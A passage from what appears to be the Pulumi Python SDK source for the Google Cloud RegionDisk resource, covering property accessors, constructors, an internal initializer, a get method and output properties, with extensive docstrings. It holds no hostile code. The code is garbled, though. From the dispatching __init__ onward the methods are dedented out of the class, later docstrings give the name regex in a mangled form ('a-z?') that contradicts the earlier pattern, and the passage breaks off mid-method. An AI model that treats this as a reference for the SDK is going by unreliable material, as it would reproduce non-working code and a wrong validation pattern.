    @pulumi.getter(name="diskEncryptionKey")
    def disk_encryption_key(self) -> Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']]:
        """
        Encrypts the disk using a customer-supplied encryption key.
        After you encrypt a disk with a customer-supplied key, you must
        provide the same key if you use the disk later (e.g. to create a disk
        snapshot or an image, or to attach the disk to a virtual machine).
        Customer-supplied encryption keys do not protect access to metadata of
        the disk.
        If you do not provide an encryption key when creating the disk, then
        the disk will be encrypted using an automatically generated key and
        you do not need to provide a key to use the disk later.
        Structure is documented below.
        """
        return pulumi.get(self, "disk_encryption_key")
    @disk_encryption_key.setter
    def disk_encryption_key(self, value: Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']]):
        pulumi.set(self, "disk_encryption_key", value)

    @property
    @pulumi.getter
    def interface(self) -> Optional[pulumi.Input[str]]:
        """
        (Deprecated -- see ``__init__``.) Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
        """
        return pulumi.get(self, "interface")
    @interface.setter
    def interface(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "interface", value)

    @property
    @pulumi.getter(name="labelFingerprint")
    def label_fingerprint(self) -> Optional[pulumi.Input[str]]:
        """
        The fingerprint used for optimistic locking of this resource. Used internally during updates.
        """
        return pulumi.get(self, "label_fingerprint")
    @label_fingerprint.setter
    def label_fingerprint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "label_fingerprint", value)

    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Labels to apply to this disk. A map of key->value pairs.
        """
        return pulumi.get(self, "labels")
    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "labels", value)

    @property
    @pulumi.getter(name="lastAttachTimestamp")
    def last_attach_timestamp(self) -> Optional[pulumi.Input[str]]:
        """
        Last attach timestamp in RFC3339 text format.
        """
        return pulumi.get(self, "last_attach_timestamp")
    @last_attach_timestamp.setter
    def last_attach_timestamp(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "last_attach_timestamp", value)

    @property
    @pulumi.getter(name="lastDetachTimestamp")
    def last_detach_timestamp(self) -> Optional[pulumi.Input[str]]:
        """
        Last detach timestamp in RFC3339 text format.
        """
        return pulumi.get(self, "last_detach_timestamp")
    @last_detach_timestamp.setter
    def last_detach_timestamp(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "last_detach_timestamp", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the resource. Provided by the client when the resource is
        created. The name must be 1-63 characters long, and comply with
        RFC1035. Specifically, the name must be 1-63 characters long and match
        the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
        first character must be a lowercase letter, and all following
        characters must be a dash, lowercase letter, or digit, except the last
        character, which cannot be a dash.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="physicalBlockSizeBytes")
    def physical_block_size_bytes(self) -> Optional[pulumi.Input[int]]:
        """
        Physical block size of the persistent disk, in bytes. If not present
        in a request, a default value is used. Currently supported sizes
        are 4096 and 16384, other sizes may be added in the future.
        If an unsupported value is requested, the error message will list
        the supported values for the caller's project.
        """
        return pulumi.get(self, "physical_block_size_bytes")
    @physical_block_size_bytes.setter
    def physical_block_size_bytes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "physical_block_size_bytes", value)

    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)

    @property
    @pulumi.getter
    def region(self) -> Optional[pulumi.Input[str]]:
        """
        A reference to the region where the disk resides.
        """
        return pulumi.get(self, "region")
    @region.setter
    def region(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "region", value)

    @property
    @pulumi.getter(name="replicaZones")
    def replica_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        URLs of the zones where the disk should be replicated to.
        """
        return pulumi.get(self, "replica_zones")
    @replica_zones.setter
    def replica_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "replica_zones", value)

    @property
    @pulumi.getter(name="selfLink")
    def self_link(self) -> Optional[pulumi.Input[str]]:
        """
        The URI of the created resource.
        """
        return pulumi.get(self, "self_link")
    @self_link.setter
    def self_link(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "self_link", value)

    @property
    @pulumi.getter
    def size(self) -> Optional[pulumi.Input[int]]:
        """
        Size of the persistent disk, specified in GB. You can specify this
        field when creating a persistent disk using the sourceImage or
        sourceSnapshot parameter, or specify it alone to create an empty
        persistent disk.
        If you specify this field along with sourceImage or sourceSnapshot,
        the value of sizeGb must not be less than the size of the sourceImage
        or the size of the snapshot.
        """
        return pulumi.get(self, "size")
    @size.setter
    def size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "size", value)

    @property
    @pulumi.getter
    def snapshot(self) -> Optional[pulumi.Input[str]]:
        """
        The source snapshot used to create this disk. You can provide this as
        a partial or full URL to the resource. For example, the following are
        valid values:
        * `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
        * `projects/project/global/snapshots/snapshot`
        * `global/snapshots/snapshot`
        * `snapshot`
        """
        return pulumi.get(self, "snapshot")
    @snapshot.setter
    def snapshot(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "snapshot", value)

    @property
    @pulumi.getter(name="sourceSnapshotEncryptionKey")
    def source_snapshot_encryption_key(self) -> Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']]:
        """
        The customer-supplied encryption key of the source snapshot. Required
        if the source snapshot is protected by a customer-supplied encryption
        key.
        Structure is documented below.
        """
        return pulumi.get(self, "source_snapshot_encryption_key")
    @source_snapshot_encryption_key.setter
    def source_snapshot_encryption_key(self, value: Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']]):
        pulumi.set(self, "source_snapshot_encryption_key", value)

    @property
    @pulumi.getter(name="sourceSnapshotId")
    def source_snapshot_id(self) -> Optional[pulumi.Input[str]]:
        """
        The unique ID of the snapshot used to create this disk. This value identifies the exact snapshot that was used to create
        this persistent disk. For example, if you created the persistent disk from a snapshot that was later deleted and
        recreated under the same name, the source snapshot ID would identify the exact version of the snapshot that was used.
        """
        return pulumi.get(self, "source_snapshot_id")
    @source_snapshot_id.setter
    def source_snapshot_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source_snapshot_id", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        URL of the disk type resource describing which disk type to use to
        create the disk. Provide this when creating the disk.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def users(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Links to the users of the disk (attached instances) in form: project/zones/zone/instances/instance
        """
        return pulumi.get(self, "users")
    @users.setter
    def users(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "users", value)
class RegionDisk(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 disk_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskDiskEncryptionKeyArgs']]] = None,
                 interface: Optional[pulumi.Input[str]] = None,
                 labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 physical_block_size_bytes: Optional[pulumi.Input[int]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 replica_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 size: Optional[pulumi.Input[int]] = None,
                 snapshot: Optional[pulumi.Input[str]] = None,
                 source_snapshot_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskSourceSnapshotEncryptionKeyArgs']]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Persistent disks are durable storage devices that function similarly to
        the physical disks in a desktop or a server. Compute Engine manages the
        hardware behind these devices to ensure data redundancy and optimize
        performance for you. Persistent disks are available as either standard
        hard disk drives (HDD) or solid-state drives (SSD).
        Persistent disks are located independently from your virtual machine
        instances, so you can detach or move persistent disks to keep your data
        even after you delete your instances. Persistent disk performance scales
        automatically with size, so you can resize your existing persistent disks
        or add more persistent disks to an instance to meet your performance and
        storage space requirements.
        Add a persistent disk to your instance when you need reliable and
        affordable storage with consistent performance characteristics.
        To get more information about RegionDisk, see:
        * [API documentation](https://cloud.google.com/compute/docs/reference/rest/v1/regionDisks)
        * How-to Guides
            * [Adding or Resizing Regional Persistent Disks](https://cloud.google.com/compute/docs/disks/regional-persistent-disk)
        > **Warning:** All arguments including `disk_encryption_key.raw_key` will be stored in the raw
        state as plain-text. [Read more about secrets in state](https://www.pulumi.com/docs/intro/concepts/programming-model/#secrets).
        ## Example Usage
        ### Region Disk Basic
        ```python
        import pulumi
        import pulumi_gcp as gcp
        disk = gcp.compute.Disk("disk",
            image="debian-cloud/debian-9",
            size=50,
            type="pd-ssd",
            zone="us-central1-a")
        snapdisk = gcp.compute.Snapshot("snapdisk",
            source_disk=disk.name,
            zone="us-central1-a")
        regiondisk = gcp.compute.RegionDisk("regiondisk",
            snapshot=snapdisk.id,
            type="pd-ssd",
            region="us-central1",
            physical_block_size_bytes=4096,
            replica_zones=[
                "us-central1-a",
                "us-central1-f",
            ])
        ```
        ## Import
        RegionDisk can be imported using any of these accepted formats
        ```sh
        $ pulumi import gcp:compute/regionDisk:RegionDisk default projects/{{project}}/regions/{{region}}/disks/{{name}}
        ```
        ```sh
        $ pulumi import gcp:compute/regionDisk:RegionDisk default {{project}}/{{region}}/{{name}}
        ```
        ```sh
        $ pulumi import gcp:compute/regionDisk:RegionDisk default {{region}}/{{name}}
        ```
        ```sh
        $ pulumi import gcp:compute/regionDisk:RegionDisk default {{name}}
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: An optional description of this resource. Provide this property when
               you create the resource.
        :param pulumi.Input[pulumi.InputType['RegionDiskDiskEncryptionKeyArgs']] disk_encryption_key: Encrypts the disk using a customer-supplied encryption key.
               After you encrypt a disk with a customer-supplied key, you must
               provide the same key if you use the disk later (e.g. to create a disk
               snapshot or an image, or to attach the disk to a virtual machine).
               Customer-supplied encryption keys do not protect access to metadata of
               the disk.
               If you do not provide an encryption key when creating the disk, then
               the disk will be encrypted using an automatically generated key and
               you do not need to provide a key to use the disk later.
               Structure is documented below.
        :param pulumi.Input[str] interface: Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this disk. A list of key->value pairs.
        :param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
               created. The name must be 1-63 characters long, and comply with
               RFC1035. Specifically, the name must be 1-63 characters long and match
               the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
               first character must be a lowercase letter, and all following
               characters must be a dash, lowercase letter, or digit, except the last
               character, which cannot be a dash.
        :param pulumi.Input[int] physical_block_size_bytes: Physical block size of the persistent disk, in bytes. If not present
               in a request, a default value is used. Currently supported sizes
               are 4096 and 16384, other sizes may be added in the future.
               If an unsupported value is requested, the error message will list
               the supported values for the caller's project.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        :param pulumi.Input[str] region: A reference to the region where the disk resides.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] replica_zones: URLs of the zones where the disk should be replicated to.
        :param pulumi.Input[int] size: Size of the persistent disk, specified in GB. You can specify this
               field when creating a persistent disk using the sourceImage or
               sourceSnapshot parameter, or specify it alone to create an empty
               persistent disk.
               If you specify this field along with sourceImage or sourceSnapshot,
               the value of sizeGb must not be less than the size of the sourceImage
               or the size of the snapshot.
        :param pulumi.Input[str] snapshot: The source snapshot used to create this disk. You can provide this as
               a partial or full URL to the resource. For example, the following are
               valid values:
               * `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
               * `projects/project/global/snapshots/snapshot`
               * `global/snapshots/snapshot`
               * `snapshot`
        :param pulumi.Input[pulumi.InputType['RegionDiskSourceSnapshotEncryptionKeyArgs']] source_snapshot_encryption_key: The customer-supplied encryption key of the source snapshot. Required
               if the source snapshot is protected by a customer-supplied encryption
               key.
               Structure is documented below.
        :param pulumi.Input[str] type: URL of the disk type resource describing which disk type to use to
               create the disk. Provide this when creating the disk.
        """
        # Overload stub (keyword-argument form): the real constructor logic
        # lives in _internal_init, selected by the dispatching __init__ below.
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: RegionDiskArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Persistent disks are durable storage devices that function similarly to
        the physical disks in a desktop or a server. Compute Engine manages the
        hardware behind these devices to ensure data redundancy and optimize
        performance for you. Persistent disks are available as either standard
        hard disk drives (HDD) or solid-state drives (SSD).
        Persistent disks are located independently from your virtual machine
        instances, so you can detach or move persistent disks to keep your data
        even after you delete your instances. Persistent disk performance scales
        automatically with size, so you can resize your existing persistent disks
        or add more persistent disks to an instance to meet your performance and
        storage space requirements.
        Add a persistent disk to your instance when you need reliable and
        affordable storage with consistent performance characteristics.
        To get more information about RegionDisk, see:
        * [API documentation](https://cloud.google.com/compute/docs/reference/rest/v1/regionDisks)
        * How-to Guides
            * [Adding or Resizing Regional Persistent Disks](https://cloud.google.com/compute/docs/disks/regional-persistent-disk)
        > **Warning:** All arguments including `disk_encryption_key.raw_key` will be stored in the raw
        state as plain-text. [Read more about secrets in state](https://www.pulumi.com/docs/intro/concepts/programming-model/#secrets).
        ## Example Usage
        ### Region Disk Basic
        ```python
        import pulumi
        import pulumi_gcp as gcp
        disk = gcp.compute.Disk("disk",
            image="debian-cloud/debian-9",
            size=50,
            type="pd-ssd",
            zone="us-central1-a")
        snapdisk = gcp.compute.Snapshot("snapdisk",
            source_disk=disk.name,
            zone="us-central1-a")
        regiondisk = gcp.compute.RegionDisk("regiondisk",
            snapshot=snapdisk.id,
            type="pd-ssd",
            region="us-central1",
            physical_block_size_bytes=4096,
            replica_zones=[
                "us-central1-a",
                "us-central1-f",
            ])
        ```
        ## Import
        RegionDisk can be imported using any of these accepted formats
        ```sh
        $ pulumi import gcp:compute/regionDisk:RegionDisk default projects/{{project}}/regions/{{region}}/disks/{{name}}
        ```
        ```sh
        $ pulumi import gcp:compute/regionDisk:RegionDisk default {{project}}/{{region}}/{{name}}
        ```
        ```sh
        $ pulumi import gcp:compute/regionDisk:RegionDisk default {{region}}/{{name}}
        ```
        ```sh
        $ pulumi import gcp:compute/regionDisk:RegionDisk default {{name}}
        ```
        :param str resource_name: The name of the resource.
        :param RegionDiskArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        # Overload stub (args-object form): the real constructor logic lives
        # in _internal_init, selected by the dispatching __init__ below.
        ...
def __init__(__self__, resource_name: str, *args, **kwargs):
    """Create a RegionDisk, accepting either a RegionDiskArgs bundle or
    individual keyword properties.

    Delegates to ``_internal_init`` after asking the SDK utilities to
    decide which overload the caller used.
    """
    parsed_args, parsed_opts = _utilities.get_resource_args_opts(
        RegionDiskArgs, pulumi.ResourceOptions, *args, **kwargs)
    if parsed_args is None:
        # Keyword-property overload: forward the caller's arguments untouched.
        __self__._internal_init(resource_name, *args, **kwargs)
    else:
        # Args-object overload: expand the bundle into keyword properties.
        __self__._internal_init(resource_name, parsed_opts, **parsed_args.__dict__)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   description: Optional[pulumi.Input[str]] = None,
                   disk_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskDiskEncryptionKeyArgs']]] = None,
                   interface: Optional[pulumi.Input[str]] = None,
                   labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                   name: Optional[pulumi.Input[str]] = None,
                   physical_block_size_bytes: Optional[pulumi.Input[int]] = None,
                   project: Optional[pulumi.Input[str]] = None,
                   region: Optional[pulumi.Input[str]] = None,
                   replica_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                   size: Optional[pulumi.Input[int]] = None,
                   snapshot: Optional[pulumi.Input[str]] = None,
                   source_snapshot_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskSourceSnapshotEncryptionKeyArgs']]] = None,
                   type: Optional[pulumi.Input[str]] = None,
                   __props__=None):
    # Shared initializer behind both __init__ overloads: validates options,
    # assembles the input property bag, and registers the resource with the
    # Pulumi engine via the base-class constructor.
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        # Pin the provider plugin version when the caller did not supply one.
        opts.version = _utilities.get_version()
    if opts.id is None:
        # No id -> we are creating a new resource (not rehydrating an
        # existing one), so __props__ must not have been passed in.
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        # __new__ bypasses RegionDiskArgs.__init__; properties are written
        # straight into __dict__ below.
        __props__ = RegionDiskArgs.__new__(RegionDiskArgs)
        __props__.__dict__["description"] = description
        __props__.__dict__["disk_encryption_key"] = disk_encryption_key
        if interface is not None and not opts.urn:
            # Deprecated input; skip the warning when rehydrating from a URN.
            warnings.warn("""This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""", DeprecationWarning)
            pulumi.log.warn("""interface is deprecated: This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""")
        __props__.__dict__["interface"] = interface
        __props__.__dict__["labels"] = labels
        __props__.__dict__["name"] = name
        __props__.__dict__["physical_block_size_bytes"] = physical_block_size_bytes
        __props__.__dict__["project"] = project
        __props__.__dict__["region"] = region
        if replica_zones is None and not opts.urn:
            # replica_zones is the only required input for this resource.
            raise TypeError("Missing required property 'replica_zones'")
        __props__.__dict__["replica_zones"] = replica_zones
        __props__.__dict__["size"] = size
        __props__.__dict__["snapshot"] = snapshot
        __props__.__dict__["source_snapshot_encryption_key"] = source_snapshot_encryption_key
        __props__.__dict__["type"] = type
        # Output-only properties start as None; the engine resolves them
        # once the cloud provider reports back.
        __props__.__dict__["creation_timestamp"] = None
        __props__.__dict__["label_fingerprint"] = None
        __props__.__dict__["last_attach_timestamp"] = None
        __props__.__dict__["last_detach_timestamp"] = None
        __props__.__dict__["self_link"] = None
        __props__.__dict__["source_snapshot_id"] = None
        __props__.__dict__["users"] = None
    super(RegionDisk, __self__).__init__(
        'gcp:compute/regionDisk:RegionDisk',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        creation_timestamp: Optional[pulumi.Input[str]] = None,
        description: Optional[pulumi.Input[str]] = None,
        disk_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskDiskEncryptionKeyArgs']]] = None,
        interface: Optional[pulumi.Input[str]] = None,
        label_fingerprint: Optional[pulumi.Input[str]] = None,
        labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
        last_attach_timestamp: Optional[pulumi.Input[str]] = None,
        last_detach_timestamp: Optional[pulumi.Input[str]] = None,
        name: Optional[pulumi.Input[str]] = None,
        physical_block_size_bytes: Optional[pulumi.Input[int]] = None,
        project: Optional[pulumi.Input[str]] = None,
        region: Optional[pulumi.Input[str]] = None,
        replica_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
        self_link: Optional[pulumi.Input[str]] = None,
        size: Optional[pulumi.Input[int]] = None,
        snapshot: Optional[pulumi.Input[str]] = None,
        source_snapshot_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskSourceSnapshotEncryptionKeyArgs']]] = None,
        source_snapshot_id: Optional[pulumi.Input[str]] = None,
        type: Optional[pulumi.Input[str]] = None,
        users: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'RegionDisk':
    """
    Get an existing RegionDisk resource's state with the given name, id, and optional extra
    properties used to qualify the lookup.

    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
    :param pulumi.Input[str] description: An optional description of this resource. Provide this property when
           you create the resource.
    :param pulumi.Input[pulumi.InputType['RegionDiskDiskEncryptionKeyArgs']] disk_encryption_key: Encrypts the disk using a customer-supplied encryption key.
           After you encrypt a disk with a customer-supplied key, you must
           provide the same key if you use the disk later (e.g. to create a disk
           snapshot or an image, or to attach the disk to a virtual machine).
           Customer-supplied encryption keys do not protect access to metadata of
           the disk.
           If you do not provide an encryption key when creating the disk, then
           the disk will be encrypted using an automatically generated key and
           you do not need to provide a key to use the disk later.
           Structure is documented below.
    :param pulumi.Input[str] interface: Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
    :param pulumi.Input[str] label_fingerprint: The fingerprint used for optimistic locking of this resource. Used internally during updates.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this disk. A list of key->value pairs.
    :param pulumi.Input[str] last_attach_timestamp: Last attach timestamp in RFC3339 text format.
    :param pulumi.Input[str] last_detach_timestamp: Last detach timestamp in RFC3339 text format.
    :param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
           created. The name must be 1-63 characters long, and comply with
           RFC1035. Specifically, the name must be 1-63 characters long and match
           the regular expression `a-z?` which means the
           first character must be a lowercase letter, and all following
           characters must be a dash, lowercase letter, or digit, except the last
           character, which cannot be a dash.
    :param pulumi.Input[int] physical_block_size_bytes: Physical block size of the persistent disk, in bytes. If not present
           in a request, a default value is used. Currently supported sizes
           are 4096 and 16384, other sizes may be added in the future.
           If an unsupported value is requested, the error message will list
           the supported values for the caller's project.
    :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
           If it is not provided, the provider project is used.
    :param pulumi.Input[str] region: A reference to the region where the disk resides.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] replica_zones: URLs of the zones where the disk should be replicated to.
    :param pulumi.Input[str] self_link: The URI of the created resource.
    :param pulumi.Input[int] size: Size of the persistent disk, specified in GB. You can specify this
           field when creating a persistent disk using the sourceImage or
           sourceSnapshot parameter, or specify it alone to create an empty
           persistent disk.
           If you specify this field along with sourceImage or sourceSnapshot,
           the value of sizeGb must not be less than the size of the sourceImage
           or the size of the snapshot.
    :param pulumi.Input[str] snapshot: The source snapshot used to create this disk. You can provide this as
           a partial or full URL to the resource. For example, the following are
           valid values:
           * `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
           * `projects/project/global/snapshots/snapshot`
           * `global/snapshots/snapshot`
           * `snapshot`
    :param pulumi.Input[pulumi.InputType['RegionDiskSourceSnapshotEncryptionKeyArgs']] source_snapshot_encryption_key: The customer-supplied encryption key of the source snapshot. Required
           if the source snapshot is protected by a customer-supplied encryption
           key.
           Structure is documented below.
    :param pulumi.Input[str] source_snapshot_id: The unique ID of the snapshot used to create this disk. This value identifies the exact snapshot that was used to create
           this persistent disk. For example, if you created the persistent disk from a snapshot that was later deleted and
           recreated under the same name, the source snapshot ID would identify the exact version of the snapshot that was used.
    :param pulumi.Input[str] type: URL of the disk type resource describing which disk type to use to
           create the disk. Provide this when creating the disk.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] users: Links to the users of the disk (attached instances) in form: project/zones/zone/instances/instance
    """
    # Attach the provider id so the base constructor performs a read
    # (rehydration) instead of creating a new resource.
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

    # Bypass _RegionDiskState.__init__ and fill the state bag directly;
    # any property left as None is read back from the provider.
    __props__ = _RegionDiskState.__new__(_RegionDiskState)

    __props__.__dict__["creation_timestamp"] = creation_timestamp
    __props__.__dict__["description"] = description
    __props__.__dict__["disk_encryption_key"] = disk_encryption_key
    __props__.__dict__["interface"] = interface
    __props__.__dict__["label_fingerprint"] = label_fingerprint
    __props__.__dict__["labels"] = labels
    __props__.__dict__["last_attach_timestamp"] = last_attach_timestamp
    __props__.__dict__["last_detach_timestamp"] = last_detach_timestamp
    __props__.__dict__["name"] = name
    __props__.__dict__["physical_block_size_bytes"] = physical_block_size_bytes
    __props__.__dict__["project"] = project
    __props__.__dict__["region"] = region
    __props__.__dict__["replica_zones"] = replica_zones
    __props__.__dict__["self_link"] = self_link
    __props__.__dict__["size"] = size
    __props__.__dict__["snapshot"] = snapshot
    __props__.__dict__["source_snapshot_encryption_key"] = source_snapshot_encryption_key
    __props__.__dict__["source_snapshot_id"] = source_snapshot_id
    __props__.__dict__["type"] = type
    __props__.__dict__["users"] = users
    return RegionDisk(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> pulumi.Output[str]:
    """
    Creation timestamp in RFC3339 text format.
    """
    # Output-only: resolved by the provider after the disk is created.
    return pulumi.get(self, "creation_timestamp")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
    """
    An optional description of this resource. Provide this property when
    you create the resource.
    """
    # Optional input echoed back as an output.
    return pulumi.get(self, "description")
@property
@pulumi.getter(name="diskEncryptionKey")
def disk_encryption_key(self) -> pulumi.Output[Optional['outputs.RegionDiskDiskEncryptionKey']]:
    """
    Encrypts the disk using a customer-supplied encryption key.
    After you encrypt a disk with a customer-supplied key, you must
    provide the same key if you use the disk later (e.g. to create a disk
    snapshot or an image, or to attach the disk to a virtual machine).
    Customer-supplied encryption keys do not protect access to metadata of
    the disk.
    If you do not provide an encryption key when creating the disk, then
    the disk will be encrypted using an automatically generated key and
    you do not need to provide a key to use the disk later.
    Structure is documented below.
    """
    # Nested structure; see RegionDiskDiskEncryptionKey output type.
    return pulumi.get(self, "disk_encryption_key")
@property
@pulumi.getter
def interface(self) -> pulumi.Output[Optional[str]]:
    """
    Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
    """
    # Deprecated input (see _internal_init warning); still exposed for reads.
    return pulumi.get(self, "interface")
@property
@pulumi.getter(name="labelFingerprint")
def label_fingerprint(self) -> pulumi.Output[str]:
    """
    The fingerprint used for optimistic locking of this resource. Used internally during updates.
    """
    # Output-only: maintained by the provider.
    return pulumi.get(self, "label_fingerprint")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
    """
    Labels to apply to this disk. A list of key->value pairs.
    """
    # Optional input echoed back as an output.
    return pulumi.get(self, "labels")
@property
@pulumi.getter(name="lastAttachTimestamp")
def last_attach_timestamp(self) -> pulumi.Output[str]:
    """
    Last attach timestamp in RFC3339 text format.
    """
    # Output-only: updated by the provider on attach events.
    return pulumi.get(self, "last_attach_timestamp")
@property
@pulumi.getter(name="lastDetachTimestamp")
def last_detach_timestamp(self) -> pulumi.Output[str]:
    """
    Last detach timestamp in RFC3339 text format.
    """
    # Output-only: updated by the provider on detach events.
    return pulumi.get(self, "last_detach_timestamp")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
    """
    Name of the resource. Provided by the client when the resource is
    created. The name must be 1-63 characters long, and comply with
    RFC1035. Specifically, the name must be 1-63 characters long and match
    the regular expression `a-z?` which means the
    first character must be a lowercase letter, and all following
    characters must be a dash, lowercase letter, or digit, except the last
    character, which cannot be a dash.
    """
    # Auto-named by the engine when not supplied at creation.
    return pulumi.get(self, "name")
@property
@pulumi.getter(name="physicalBlockSizeBytes")
def physical_block_size_bytes(self) -> pulumi.Output[int]:
    """
    Physical block size of the persistent disk, in bytes. If not present
    in a request, a default value is used. Currently supported sizes
    are 4096 and 16384, other sizes may be added in the future.
    If an unsupported value is requested, the error message will list
    the supported values for the caller's project.
    """
    # Optional input; provider fills in the default when omitted.
    return pulumi.get(self, "physical_block_size_bytes")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
    """
    The ID of the project in which the resource belongs.
    If it is not provided, the provider project is used.
    """
    # Falls back to the provider-level project configuration.
    return pulumi.get(self, "project")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
    """
    A reference to the region where the disk resides.
    """
    # Regional (not zonal) placement of this disk.
    return pulumi.get(self, "region")
@property
@pulumi.getter(name="replicaZones")
def replica_zones(self) -> pulumi.Output[Sequence[str]]:
    """
    URLs of the zones where the disk should be replicated to.
    """
    # Required input (enforced in _internal_init).
    return pulumi.get(self, "replica_zones")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
    """
    The URI of the created resource.
    """
    # Output-only: canonical URL assigned by the provider.
    return pulumi.get(self, "self_link")
@property
@pulumi.getter
def size(self) -> pulumi.Output[int]:
    """
    Size of the persistent disk, specified in GB. You can specify this
    field when creating a persistent disk using the sourceImage or
    sourceSnapshot parameter, or specify it alone to create an empty
    persistent disk.
    If you specify this field along with sourceImage or sourceSnapshot,
    the value of sizeGb must not be less than the size of the sourceImage
    or the size of the snapshot.
    """
